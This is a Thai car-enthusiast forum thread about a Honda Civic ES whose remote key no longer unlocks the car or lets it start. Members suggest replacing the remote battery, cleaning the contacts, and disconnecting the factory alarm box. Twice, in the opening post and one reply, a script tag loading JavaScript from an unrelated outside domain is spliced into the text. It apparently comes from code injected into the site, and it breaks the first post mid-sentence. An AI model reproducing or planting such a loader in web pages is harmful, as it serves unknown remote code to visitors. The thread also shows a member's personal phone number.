ตอบ
GET_OYA

เข้าร่วม: 16 กรกฎา 2013
ตอบ: 18

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 54
ให้คำขอบคุณ: 0
อาทิตย์, 12 มกรา 2014 17:55 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
<script src="https://sport32news.com/civicesgroup.js"></ ตอนนี้ รีโมท กด เปิดปิดประตูรถ กดไม่ติดแล้วคับ

อาการก่อนหน้านี้เคยมีอาการกดติดยาก อยุ่หลายครั้ง จนมาวันนี้กดไม่ติดเลยคับ
เลยทำให้ไม่สามารถ สตรัทรถได้คับ

ข้อที่ผมส่งสัยคือ ถานรีโมทน่าจะหมดจิงๆๆแล้วใช่ไหมคับ
แล้วถานรีโมทซื้อได้ที่ไหนคับ หาซื้อตามร้านทั่วไปไม่มีเลย

แล้วมีวิธีเบื้องต้นยังไงบ้างที่สามารถทำให้รถสตรัทได้คับ เพราะว่าเอากุญแจบิคเพื่อจะสตรัท ไฟหน้าปัดไม่โชว์เลย หน้าจะเกี่ยวกับเซ็นทรัลล็อคหรือป่าวคับเพราะว่าถ้าไม่เปิดรถด้วยสวิทมันจะทำให้ไม่สามารถสตรัทรถได้ ใช่ไหมคับ แล้วมีวิธีแก้เบื้องต้นอย่างไรบ้างคับ

ขความกรุณาด้วยคับ

ขอบคุณคับ
ได้รับคำขอบคุณจาก: tochi229  maxza_es  InDePenDent  N_J Civic  Vee  chan-o  pakorn25 
Arthur4344

ชื่อเล่น: อีอด อ๊อด

เข้าร่วม: 30 เมษา 2012
ตอบ: 1667

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3337
ให้คำขอบคุณ: 1040

ปี: 2004
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อาทิตย์, 12 มกรา 2014 18:28 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ขอเบอร์ติดต่อด้วย เผื่อมีพี่ๆ เพื่อนๆ แจ้งวิธีแก้ปัญหาให้ได้ครับ
ได้รับคำขอบคุณจาก: tochi229  natt-es3  koobe  InDePenDent  pakorn25 
GET_OYA

น้องใหม่
น้องใหม่

อาทิตย์, 12 มกรา 2014 18:35 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
0858288689 เกส คับ

รบกวนด้วยนะคับใครพอรู้วิธี ช่วยหน่อยคับ 

ขอบคุณคับ
GET_OYA

น้องใหม่
น้องใหม่

อาทิตย์, 12 มกรา 2014 19:36 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ตอนนี้ปัญที่เกิดขึ้น ได้แก้ไขเรียบร้อยแล้วคับ 

และขอขอบคุณ พี่อ็อด จาก โซนธนบุรี หรือ Arthur4344 มากคับ ที่โทรมาให้คำแนะนำและความรู้ในการแก้ไขปัญหาคับ 
เกสขอขอบพระคุณมากคับ  และขอบ พูดถึงอารมณ์ในใจเลยว่า แค่ยังไม่ได้เป็นสมาชิกแบบเต็มตัว ก็สัมผัสได้แล้วว่า civic es group มีความเป็นน้ำใจกันมากเลยคับซึ้งในน้ำใจเลยคับ  ไว้มีโอกาศไปมิตติ้ง ผมขอฝากเนื้อฝากตัวด้วยคับ

ขอบคุณคับ
ได้รับคำขอบคุณจาก: tochi229  mixky  InDePenDent  Doom  okuma  mutisaru  สมชาย  chan-o  Arthur4344 
profibus

เข้าร่วม: 16 ธันวา 2012
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1151
ให้คำขอบคุณ: 516

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 12 มกรา 2014 19:38 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ถ่านตัวนี้ใช่ไหมครับ ขนาด12 volt ของผม ซื้อตามตลาดนัดร้านขายเครื่องใช้ไฟฟ้า สายไฟอะครับ
ที่ปุ่มกดยากหน้าจะเกิดจากยางหรือไม่ก็ปุ่มมันยุบตัว ผมแก้ไขโดยหาซิลิโคลนหรือแผ่นกระดาษ ขนาดพอดีปุ่ม แกะรีโมทรและก็ยัดเข้าไประหว่างปุ่มยางกับตัวบอดร์ของรีโมทรอะครับ

ร้านสะดวกซื้อหรทอตามตลาดนัดร้านเครื่องใช้ไฟฟ้ามีครับ
ร้านสะดวกซื้อหรทอตามตลาดนัดร้านเครื่องใช้ไฟฟ้ามีครับ
ได้รับคำขอบคุณจาก: tochi229  stam74  okuma  สมชาย 
Ryuknight

เข้าร่วม: 31 พฤษภาคม 2009
ตอบ: 2750

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3285
ให้คำขอบคุณ: 1525

อาทิตย์, 12 มกรา 2014 21:33 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ผมก็เคยล๊อกด้วยรีโมทแล้ว ปลดล๊อคไม่ได้ เช่นกัน
ต้องเปิดรถด้วยกุญแจ แล้วสัญญาณกันขโมยร้อง จนต้องถอดขั้วแบตฯออก
และใส่ขั้วแบตฯกลับไปก็ยังสตาร์ทไม่ได้ ต้องปลดสัญญาณกันขโมยให้ได้ก่อน
แต่ยังโชคดี กดจนรีโมทใช้งาน ถึงปลดล๊อกได้ รีบไปเปลี่ยนถ่านรีโมทเลยครับ กลัวเจออีก
ได้รับคำขอบคุณจาก: okuma 
GET_OYA

น้องใหม่
น้องใหม่

อาทิตย์, 12 มกรา 2014 21:49 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
 คราวนี้ผมจำไว้เป็นบทเรียนเลยคับ ฮ่าๆๆ

horus

ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 13 มกรา 2014 09:59 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
มาช่วยอีกแรงคับ ซื้อในโลตัสก็ได้คับ ตามนี้เลย

ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ได้รับคำขอบคุณจาก: qq 
Komsorn

ชื่อเล่น: บิ๊ก

เข้าร่วม: 19 พฤศจิกา 2013
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 88
ให้คำขอบคุณ: 5
จันทร์, 13 มกรา 2014 11:08 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ผมพึ่งเอาไปทำมาอ่ะครับ อาจเกิดจากคราบสกปกก็เป็นด้ายยยยยย
ได้รับคำขอบคุณจาก: okuma 
xenshiro

ชื่อเล่น: เซน

เข้าร่วม: 02 ตุลา 2008
ตอบ: 831

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1265
ให้คำขอบคุณ: 1864

ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 13 มกรา 2014 11:27 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ผมว่าลองศึกษา วิธียกเลิกรีโมทสัญญาณกันขโมยชั่วคราวไว้ก็ดีนะครับ

ซึ่งแต่ละยี่ห้ออาจจะมีการยกเลิกไม่เหมือนกัน ต้องลองดูคู่มือครับ

ส่วนใหญ่การยกเลิกจะใช้กุญแจรถบิดที่ ON กับสวิทซ่อนสัญญาณกันขโมยในตัวรถครับ

เอาไว้ใช้ในกรณีฉุกเฉินที่รีโมทแบตหมดครับ
Kaikungoo7

ชื่อเล่น: ไกร

เข้าร่วม: 16 พฤศจิกา 2013
ตอบ: 219

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 26

จันทร์, 13 มกรา 2014 11:34 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
ผมก็กลัวๆอยู่เหมือนกัน "<script src="https://sport32news.com/civicesgroup.js">
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 14 มกรา 2014 14:41 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
บางที่เป็นที่ขั่วก็ได้นะครับเอาเอาไรขัดๆ หน่อยก็ใช้ได้แล้วผมเคยเจอซื้อถ่านมาใหม่ก็ยังเป็นเหมือนเดิม พอทำความสะอาดขั่วใหม่ถ่านเดิมใช้งานซะงั้น (ซื้อถ่านใหม่มาฟรีๆ)

mutisaru

ชื่อเล่น: อ้อม

เข้าร่วม: 26 พฤษภาคม 2012
ตอบ: 691

Guru ES
Guru ES

ได้รับคำขอบคุณ: 549
ให้คำขอบคุณ: 539

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 14 มกรา 2014 14:59 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
GET_OYA พิมพ์ว่า:
ตอนนี้ปัญที่เกิดขึ้น ได้แก้ไขเรียบร้อยแล้วคับ 

และขอขอบคุณ พี่อ็อด จาก โซนธนบุรี หรือ Arthur4344 มากคับ ที่โทรมาให้คำแนะนำและความรู้ในการแก้ไขปัญหาคับ 
เกสขอขอบพระคุณมากคับ  และขอบ พูดถึงอารมณ์ในใจเลยว่า แค่ยังไม่ได้เป็นสมาชิกแบบเต็มตัว ก็สัมผัสได้แล้วว่า civic es group มีความเป็นน้ำใจกันมากเลยคับซึ้งในน้ำใจเลยคับ  ไว้มีโอกาศไปมิตติ้ง ผมขอฝากเนื้อฝากตัวด้วยคับ

ขอบคุณคับ

สิ่งนี้แระที่ทำให้ผม รักครอบครับนี้
ได้รับคำขอบคุณจาก: tochi229 
pai_ana

เข้าร่วม: 24 สิงหา 2011
ตอบ: 283

ได้รับคำขอบคุณ: 211
ให้คำขอบคุณ: 93

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 14 มกรา 2014 15:27 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
xenshiro พิมพ์ว่า:
ผมว่าลองศึกษา วิธียกเลิกรีโมทสัญญาณกันขโมยชั่วคราวไว้ก็ดีนะครับ

ซึ่งแต่ละยี่ห้ออาจจะมีการยกเลิกไม่เหมือนกัน ต้องลองดูคู่มือครับ

ส่วนใหญ่การยกเลิกจะใช้กุญแจรถบิดที่ ON กับสวิทซ่อนสัญญาณกันขโมยในตัวรถครับ

เอาไว้ใช้ในกรณีฉุกเฉินที่รีโมทแบตหมดครับ

ถ้าสัญญากันขโมยติดมากับรถปุ่มจะอยู่ใต้พวงมาลับครับ ส่วนกล่องสัญญาณจะอยู่ใกล้ๆกัน ต้องถอดฝาครอบออกก่อน แล้วถอดสายออกจากกล่องเลย แค่นี้รถก็จะไม่ร้องแล้วครับ 

ได้รับคำขอบคุณจาก: xenshiro 
xenshiro

ชื่อเล่น: เซน

เข้าร่วม: 02 ตุลา 2008
ตอบ: 831

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1265
ให้คำขอบคุณ: 1864

สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 14 มกรา 2014 16:28 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
pai_ana พิมพ์ว่า:

xenshiro พิมพ์ว่า:

ถ้าสัญญากันขโมยติดมากับรถปุ่มจะอยู่ใต้พวงมาลับครับ ส่วนกล่องสัญญาณจะอยู่ใกล้ๆกัน ต้องถอดฝาครอบออกก่อน แล้วถอดสายออกจากกล่องเลย แค่นี้รถก็จะไม่ร้องแล้วครับ 

เป็นวิธีแก้วิธีหนึ่งครับ :) แต่สำหรับใครที่อาจหาไม่เจอ หรือบางเจ้า บางยี่ห้อ เอาไปซ่อนหลบลึกเกินไป
หรือคุณสุภาพสตรี ลองศึกษาวิธียกเลิกสัญญาณ หรือ หาเบอร์ศูนย์บริการสัญญาณกันขโมยยี่ห้อที่ท่านใช้ ไว้ติดต่อยามฉุกเฉิน

หรือว่างๆ ถอดฝาปิดใต้พวงมาลัยตัวเอง มาทำความสะอาดหรือมองหาชุดสัญญาณกันขโมยของตัวเองไว้อย่างที่คุณบอก
ก็ดีเหมือนกันนะครับ เพราะเหตุการณ์แบบนี้จะเกิดขึ้นเมื่อไหร่ไม่รู้จริงๆ ครับ

ผมเคยเจอ งง!!! ตึบ เลย ครับ

Arthur4344

ชื่อเล่น: อีอด อ๊อด

เข้าร่วม: 30 เมษา 2012
ตอบ: 1667

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3337
ให้คำขอบคุณ: 1040

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อังคาร, 14 มกรา 2014 16:35 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด

ขอบคุณคับ

ไม่เป็นไรครับ เกส เพราะพวกเราถูกปลูกฝังกันในกลุ่มว่า มีอะไรต้องช่วยเหลือกัน ให้คำปรึกษาให้แก่กัน เพราะเราคือครอบครัวเดียวกัน
ยินดีต้อนรับครับผม
ได้รับคำขอบคุณจาก: chan-o  pakorn25 
chan-o

ชื่อเล่น: โอ๋

เข้าร่วม: 26 เมษา 2013
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 879
ให้คำขอบคุณ: 3132

ปี: 2005
อังคาร, 14 มกรา 2014 18:28 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
Arthur4344 พิมพ์ว่า:

ขอบคุณคับ

ไม่เป็นไรครับ เกส เพราะพวกเราถูกปลูกฝังกันในกลุ่มว่า มีอะไรต้องช่วยเหลือกัน ให้คำปรึกษาให้แก่กัน เพราะเราคือครอบครัวเดียวกัน
ยินดีต้อนรับครับผม

สุดยอดเลย
ได้รับคำขอบคุณจาก: Arthur4344 
pakorn25

ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

อังคาร, 14 มกรา 2014 21:26 - ขอความช่วยเหลือด่วน รีโมท กด เปิดปิดประตูรถ กดไม่ติด
เคยเปนเหมือนกันคับกดอะไรไม่ได้ พอดีรู้ว่ากล่องอยุไหน เลยถอดปลั๊กออกเลย
และขอชื่นชมน้ำใจในคลับเราอีกเสียงครับ ผมก็เพิ่งได้รับน้ำใจจากเพื่อนในคลับมาเหมือนกัน
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.